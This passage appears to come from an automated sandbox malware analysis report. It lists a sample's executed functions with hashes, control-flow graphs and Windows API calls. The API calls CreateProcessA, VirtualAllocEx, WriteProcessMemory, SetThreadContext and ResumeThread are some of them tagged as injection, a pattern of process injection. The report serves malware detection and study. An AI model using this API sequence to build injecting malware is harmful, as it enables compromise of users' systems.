73f87c0 17241 73f8849 CreateProcessA 17240->17241 17243 73f8a0b 17241->17243 17244 7b78c48 17245 7b78c5d 17244->17245 17248 73f83b8 17245->17248 17249 73f83f8 VirtualAllocEx 17248->17249 17251 73f8435 17249->17251

                                                                                                Executed Functions

                                                                                                Function 07B76468 Relevance: .2, Instructions: 234COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.301786156.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7b70000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 393165bc213de7786178be5b9c5d3af0ccc65a87dc81c0839f9530908fa1aa01
                                                                                                • Instruction ID: 3d9655c416fab949d6efe9cf3939b2796fb43a39932b1727c0f37edc11092013
                                                                                                • Opcode Fuzzy Hash: 393165bc213de7786178be5b9c5d3af0ccc65a87dc81c0839f9530908fa1aa01
                                                                                                • Instruction Fuzzy Hash: 8F9153B4E05619CFDB04CFAAC5809EEFBF2BF89304F24956AD419AB245D7349942CF60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07B76478 Relevance: .2, Instructions: 233COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.301786156.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7b70000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d65e7df1a441a18eb5e85287b206fd136b88727390516fb1f9e095a824ab5158
                                                                                                • Instruction ID: 7123084be56ba6978380347c7f16433f147e498fef1f67ec46e7b380b410bc48
                                                                                                • Opcode Fuzzy Hash: d65e7df1a441a18eb5e85287b206fd136b88727390516fb1f9e095a824ab5158
                                                                                                • Instruction Fuzzy Hash: 3F9144B4E05619CFDB04CFAAC5809EEFBF2BF89304F24956AD419AB205D7349942CF64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07B7653D Relevance: .2, Instructions: 199COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.301786156.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7b70000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 08636596734383af9bee7bdb8399ded380a84de2e637ee3d7c6b9d3ed31833cd
                                                                                                • Instruction ID: c6e8585baef6aae6ebedfc6ac34fe2a78c15ec89b1b60118cd7c263bf98b5ccb
                                                                                                • Opcode Fuzzy Hash: 08636596734383af9bee7bdb8399ded380a84de2e637ee3d7c6b9d3ed31833cd
                                                                                                • Instruction Fuzzy Hash: FF8133B4E0561ACFDB04CFA9C5809EEFBF2BF89314F24955AD41ABB205D3349942CB64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 073F99D8 Relevance: .1, Instructions: 130COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.300061969.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_73f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 03bdb44181db2b9503ba32e0815b44414ef25e71d0d87d785fe0d5f4fd2a861d
                                                                                                • Instruction ID: 37e90e1765e7f8c18562981e44f7385d37016f48bf33d0855153052ce8646bcd
                                                                                                • Opcode Fuzzy Hash: 03bdb44181db2b9503ba32e0815b44414ef25e71d0d87d785fe0d5f4fd2a861d
                                                                                                • Instruction Fuzzy Hash: A04153B4E16108CBEF14DFA9C9407EDBBFAABCE340F149529D509F7644DB30A8018B54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014FC300 Relevance: 6.1, APIs: 4, Instructions: 122threadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 014FC370
                                                                                                • GetCurrentThread.KERNEL32 ref: 014FC3AD
                                                                                                • GetCurrentProcess.KERNEL32 ref: 014FC3EA
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 014FC443
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275313052.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_14f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: 3b8e6e578a96f313b0b7cba264bcd7653185a220a39e9a6082bc5aa87c637c16
                                                                                                • Instruction ID: 812c6fe09926b4a98b1fbb333e79727dbe007c5696be323bf09ed94b1ddfc9ba
                                                                                                • Opcode Fuzzy Hash: 3b8e6e578a96f313b0b7cba264bcd7653185a220a39e9a6082bc5aa87c637c16
                                                                                                • Instruction Fuzzy Hash: 795164B89007498FDB14CFAAC988B9EBFF1EF48314F20845EE509A7360D7756984CB65
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014FC310 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 014FC370
                                                                                                • GetCurrentThread.KERNEL32 ref: 014FC3AD
                                                                                                • GetCurrentProcess.KERNEL32 ref: 014FC3EA
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 014FC443
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275313052.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_14f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: a038797c31ff0706112d866e5c8e69faa38c401664dcff167187accc36a43638
                                                                                                • Instruction ID: 61c920a9e146373a10738ebb8341f31f6a07d2b7d9c66cf76d1bae8a55ba9790
                                                                                                • Opcode Fuzzy Hash: a038797c31ff0706112d866e5c8e69faa38c401664dcff167187accc36a43638
                                                                                                • Instruction Fuzzy Hash: 285155B89007498FDB14CFAAC988B9EBFF5EF48314F20845EE509A7360C7756984CB65
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 073F87C0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 38 73f87c0-73f8855 40 73f888e-73f88ae 38->40 41 73f8857-73f8861 38->41 46 73f88e7-73f8916 40->46 47 73f88b0-73f88ba 40->47 41->40 42 73f8863-73f8865 41->42 44 73f8888-73f888b 42->44 45 73f8867-73f8871 42->45 44->40 48 73f8875-73f8884 45->48 49 73f8873 45->49 55 73f894f-73f8a09 CreateProcessA 46->55 56 73f8918-73f8922 46->56 47->46 51 73f88bc-73f88be 47->51 48->48 50 73f8886 48->50 49->48 50->44 52 73f88e1-73f88e4 51->52 53 73f88c0-73f88ca 51->53 52->46 57 73f88ce-73f88dd 53->57 58 73f88cc 53->58 69 73f8a0b-73f8a11 55->69 70 73f8a12-73f8a98 55->70 56->55 59 73f8924-73f8926 56->59 57->57 60 73f88df 57->60 58->57 61 73f8949-73f894c 59->61 62 73f8928-73f8932 59->62 60->52 61->55 64 73f8936-73f8945 62->64 65 73f8934 62->65 64->64 66 73f8947 64->66 65->64 66->61 69->70 80 73f8a9a-73f8a9e 70->80 81 73f8aa8-73f8aac 70->81 80->81 82 73f8aa0 80->82 83 73f8aae-73f8ab2 81->83 84 73f8abc-73f8ac0 81->84 82->81 83->84 85 73f8ab4 83->85 86 73f8ac2-73f8ac6 84->86 87 73f8ad0-73f8ad4 84->87 85->84 86->87 88 73f8ac8 86->88 89 73f8ae6-73f8aed 87->89 90 73f8ad6-73f8adc 87->90 88->87 91 73f8aef-73f8afe 89->91 92 73f8b04 89->92 90->89 91->92
                                                                                                APIs
                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073F89F6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.300061969.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_73f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: a62ab941b9accc2e45cfad659afe52d84c40161aa06d0f3377b6fc059cfd15ab
                                                                                                • Instruction ID: b9965db5b9e07a55f0b66541c73315ffed396a2daf296afd4526d9e6ec1c1b8f
                                                                                                • Opcode Fuzzy Hash: a62ab941b9accc2e45cfad659afe52d84c40161aa06d0f3377b6fc059cfd15ab
                                                                                                • Instruction Fuzzy Hash: 04912AB1D0021ACFEB14CFA9C8417DEBAB2FF44354F1485A9D919A7240DB749985CF92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014FA028 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 94 14fa028-14fa03d call 14f9370 97 14fa03f 94->97 98 14fa053-14fa057 94->98 150 14fa045 call 14fa2a0 97->150 151 14fa045 call 14fa2b0 97->151 99 14fa06b-14fa0ac 98->99 100 14fa059-14fa063 98->100 105 14fa0ae-14fa0b6 99->105 106 14fa0b9-14fa0c7 99->106 100->99 101 14fa04b-14fa04d 101->98 103 14fa188-14fa248 101->103 143 14fa24a-14fa24d 103->143 144 14fa250-14fa27b GetModuleHandleW 103->144 105->106 108 14fa0eb-14fa0ed 106->108 109 14fa0c9-14fa0ce 106->109 112 14fa0f0-14fa0f7 108->112 110 14fa0d9 109->110 111 14fa0d0-14fa0d7 call 14f937c 109->111 115 14fa0db-14fa0e9 110->115 111->115 116 14fa0f9-14fa101 112->116 117 14fa104-14fa10b 112->117 115->112 116->117 119 14fa10d-14fa115 117->119 120 14fa118-14fa121 call 14f938c 117->120 119->120 124 14fa12e-14fa133 120->124 125 14fa123-14fa12b 120->125 127 14fa135-14fa13c 124->127 128 14fa151-14fa155 124->128 125->124 127->128 129 14fa13e-14fa14e call 14f939c call 14f93ac 127->129 148 14fa158 call 14fa599 128->148 149 14fa158 call 14fa5a8 128->149 129->128 132 14fa15b-14fa15e 135 14fa181-14fa187 132->135 136 14fa160-14fa17e 132->136 136->135 143->144 145 14fa27d-14fa283 144->145 146 14fa284-14fa298 144->146 145->146 148->132 149->132 150->101 151->101
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 014FA26E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275313052.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_14f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: c5da2e6f7502da5096bae8eb1810d9807035e280251437e2617cdd6fe3b334a6
                                                                                                • Instruction ID: 893ab0eef3e5a2bf88fbaf26e7f67491e41188cfacd85519e88cf15511e858a1
                                                                                                • Opcode Fuzzy Hash: c5da2e6f7502da5096bae8eb1810d9807035e280251437e2617cdd6fe3b334a6
                                                                                                • Instruction Fuzzy Hash: F07112B0A00B058FDB24DF2AD44075BBBF5BF88344F10892ED58ADBB60DB35E8458B91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014F3DE8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 152 14f3de8-14f5431 CreateActCtxA 155 14f543a-14f5494 152->155 156 14f5433-14f5439 152->156 163 14f5496-14f5499 155->163 164 14f54a3-14f54a7 155->164 156->155 163->164 165 14f54a9-14f54b5 164->165 166 14f54b8 164->166 165->166 168 14f54b9 166->168 168->168
                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 014F5421
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275313052.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_14f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                • Opcode ID: ab42b95f630aa23bcb0cc9f8cd292c88e6fcdcdce844e34a73bd71deb37862bb
                                                                                                • Instruction ID: ddf3642a80df59df8079f6e72014d1d8ba5d273d33a5699ef41fde55bb9ae045
                                                                                                • Opcode Fuzzy Hash: ab42b95f630aa23bcb0cc9f8cd292c88e6fcdcdce844e34a73bd71deb37862bb
                                                                                                • Instruction Fuzzy Hash: D241E375D00718CFDB24CFA9C88478EBBB5FF48305F24806AD509AB251DBB56986CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014F5364 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 169 14f5364-14f5431 CreateActCtxA 171 14f543a-14f5494 169->171 172 14f5433-14f5439 169->172 179 14f5496-14f5499 171->179 180 14f54a3-14f54a7 171->180 172->171 179->180 181 14f54a9-14f54b5 180->181 182 14f54b8 180->182 181->182 184 14f54b9 182->184 184->184
                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 014F5421
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275313052.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_14f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                • Opcode ID: 09fefd44edbf3d3158bb278a3bd09f23b0c498de100c97aea6b00ce82827039b
                                                                                                • Instruction ID: 4c4a2bdbadfdd9b47559d6524d5b4776c76d63dc816dd81b0b2341d6ac21001c
                                                                                                • Opcode Fuzzy Hash: 09fefd44edbf3d3158bb278a3bd09f23b0c498de100c97aea6b00ce82827039b
                                                                                                • Instruction Fuzzy Hash: 0641D175D00719CEDB24CFA9C98578EBBB1BF48305F24806AD409AB251DB755986CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 073F84A8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 185 73f84a8-73f84f6 187 73f84f8-73f8504 185->187 188 73f8506-73f8545 WriteProcessMemory 185->188 187->188 190 73f854e-73f857e 188->190 191 73f8547-73f854d 188->191 191->190
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073F8538
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.300061969.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_73f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: 7c22009e6b66281fc4bffad80a1df781688266de63bfeb9cee98eeb65651c175
                                                                                                • Instruction ID: 972cb4464014c2cef67cd8c655b8a9ba7b96510a6659f93a45fc6b290bcd36af
                                                                                                • Opcode Fuzzy Hash: 7c22009e6b66281fc4bffad80a1df781688266de63bfeb9cee98eeb65651c175
                                                                                                • Instruction Fuzzy Hash: 1A2157B59003199FCB10CFAAC884BDEBBF5FF48354F50842AE918A7240D7789944CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014FC938 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 195 14fc938-14fc93a 196 14fc940-14fc9d4 DuplicateHandle 195->196 197 14fc9dd-14fc9fa 196->197 198 14fc9d6-14fc9dc 196->198 198->197
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014FC9C7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275313052.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_14f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: be8c35392a78830e49176b7b4de9aa88e4bfec8916247cc1547cbc7a0d626cdf
                                                                                                • Instruction ID: 323376ecc6c54b52861c2087c864c98a8ae694d85eee3af7667ff898c073985c
                                                                                                • Opcode Fuzzy Hash: be8c35392a78830e49176b7b4de9aa88e4bfec8916247cc1547cbc7a0d626cdf
                                                                                                • Instruction Fuzzy Hash: BE21E6B5900209DFDB10CFAAD984ADEBFF9FB48324F14841AE955A7310D378A944CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 073F8220 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 201 73f8220-73f826b 203 73f826d-73f8279 201->203 204 73f827b-73f82ab SetThreadContext 201->204 203->204 206 73f82ad-73f82b3 204->206 207 73f82b4-73f82e4 204->207 206->207
                                                                                                APIs
                                                                                                • SetThreadContext.KERNELBASE(?,00000000), ref: 073F829E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.300061969.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_73f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThread
                                                                                                • String ID:
                                                                                                • API String ID: 1591575202-0
                                                                                                • Opcode ID: cec4f6441e14430d0389ae69334ad318c1cb21a66c2de49d34157143a246cdad
                                                                                                • Instruction ID: 4d53e1b0b2ff52e5be099e2ceec2ddd65589990c8bc5335b27fd3813480874b9
                                                                                                • Opcode Fuzzy Hash: cec4f6441e14430d0389ae69334ad318c1cb21a66c2de49d34157143a246cdad
                                                                                                • Instruction Fuzzy Hash: 5D2168B59003099FDB10CFAEC8847EEBBF5EF48364F54842AD459A7240CB78A945CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 073F85C8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 211 73f85c8-73f8655 ReadProcessMemory 214 73f865e-73f868e 211->214 215 73f8657-73f865d 211->215 215->214
                                                                                                APIs
                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073F8648
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.300061969.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_73f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessRead
                                                                                                • String ID:
                                                                                                • API String ID: 1726664587-0
                                                                                                • Opcode ID: a9237587e2b9c603b5fabdd633b1b8a379b7e334ab76d7e10d4b5ab2a09ccd52
                                                                                                • Instruction ID: 9a76f22802235f797b5c7859b9a67d230ff11705c9ae2298ccaaed9d8bf49c08
                                                                                                • Opcode Fuzzy Hash: a9237587e2b9c603b5fabdd633b1b8a379b7e334ab76d7e10d4b5ab2a09ccd52
                                                                                                • Instruction Fuzzy Hash: DF2148B58003099FCB10CFAAC880ADEBBF5FF48324F50842AE518A7240D7799941CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014FC940 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 219 14fc940-14fc9d4 DuplicateHandle 220 14fc9dd-14fc9fa 219->220 221 14fc9d6-14fc9dc 219->221 221->220
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014FC9C7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275313052.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_14f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: 3721dbde2c47e4157f2fae6448fda276115841a223ef468aced2750f0e26d91c
                                                                                                • Instruction ID: 87029a1a8782e414c31aded9125fae86c81c474779f53aff4b8c62621a16e38d
                                                                                                • Opcode Fuzzy Hash: 3721dbde2c47e4157f2fae6448fda276115841a223ef468aced2750f0e26d91c
                                                                                                • Instruction Fuzzy Hash: 7B21E4B59002099FDB10CF9AD984ADEBFF9EB48324F14841AE954A3310D378A944CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014F93D8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 224 14f93d8-14fa4d0 226 14fa4d8-14fa507 LoadLibraryExW 224->226 227 14fa4d2-14fa4d5 224->227 228 14fa509-14fa50f 226->228 229 14fa510-14fa52d 226->229 227->226 228->229
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014FA2E9,00000800,00000000,00000000), ref: 014FA4FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275313052.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_14f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: a9f40052cfe132c18505e9340ac147019f70c2d5347046e773b7301b6d71a479
                                                                                                • Instruction ID: adbc7a372e8c93ea87dc42fb56c645a363a8b20cecfb8fb864c72952bdc1e709
                                                                                                • Opcode Fuzzy Hash: a9f40052cfe132c18505e9340ac147019f70c2d5347046e773b7301b6d71a479
                                                                                                • Instruction Fuzzy Hash: 6911D6B69003099FDB14CF9AD848A9EFBF5AB48314F14842ED519A7310C375A945CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014FA488 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 232 14fa488-14fa4d0 234 14fa4d8-14fa507 LoadLibraryExW 232->234 235 14fa4d2-14fa4d5 232->235 236 14fa509-14fa50f 234->236 237 14fa510-14fa52d 234->237 235->234 236->237
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014FA2E9,00000800,00000000,00000000), ref: 014FA4FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275313052.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_14f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: 74aa440b3ac995e60854c9620f5f07e73cac81129bb446e756a4be5a600f79be
                                                                                                • Instruction ID: f2d2b3bdd01fba4798f7349297ee6c3017a1ad672fe6b718fa35ced9eeacac13
                                                                                                • Opcode Fuzzy Hash: 74aa440b3ac995e60854c9620f5f07e73cac81129bb446e756a4be5a600f79be
                                                                                                • Instruction Fuzzy Hash: 6D1106B68002099FDB14CFAAD444ADEBBF5AB48314F10842ED519A7310C375A545CFA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 073F83B8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 240 73f83b8-73f8433 VirtualAllocEx 243 73f843c-73f8461 240->243 244 73f8435-73f843b 240->244 244->243
                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073F8426
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.300061969.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_73f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: fca475eb377e6fd434ea65f06fb02f26a071b240ecbb79fd7b9cba3eb402f05d
                                                                                                • Instruction ID: def0965c4f35096fe00225679e6d51bd8d5e7e5ea911c47b32f7d243bda93ed2
                                                                                                • Opcode Fuzzy Hash: fca475eb377e6fd434ea65f06fb02f26a071b240ecbb79fd7b9cba3eb402f05d
                                                                                                • Instruction Fuzzy Hash: 271167759003099FCB10DFAAC8446DFBFF6EF48324F148819E519A7250C775A940CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 073F8140 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 248 73f8140-73f81af ResumeThread 251 73f81b8-73f81dd 248->251 252 73f81b1-73f81b7 248->252 252->251
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.300061969.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_73f0000_g0PWOnCNZH.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: c54bdc5c3f44672ef4746788696f2a1bd5e71e6b303d74f31e776dda542b36d4
                                                                                                • Instruction ID: 2eb5a55635c71f9dfc5fbb389f6be467eda8a935474c138099974ab41388be4c
                                                                                                • Opcode Fuzzy Hash: c54bdc5c3f44672ef4746788696f2a1bd5e71e6b303d74f31e776dda542b36d4
                                                                                                • Instruction Fuzzy Hash: 4E1128B59003498BDB14DFAEC8447DEFBF5AF88364F248819D459A7240C779A944CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 014FA208 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 014FA26E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.275313052.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
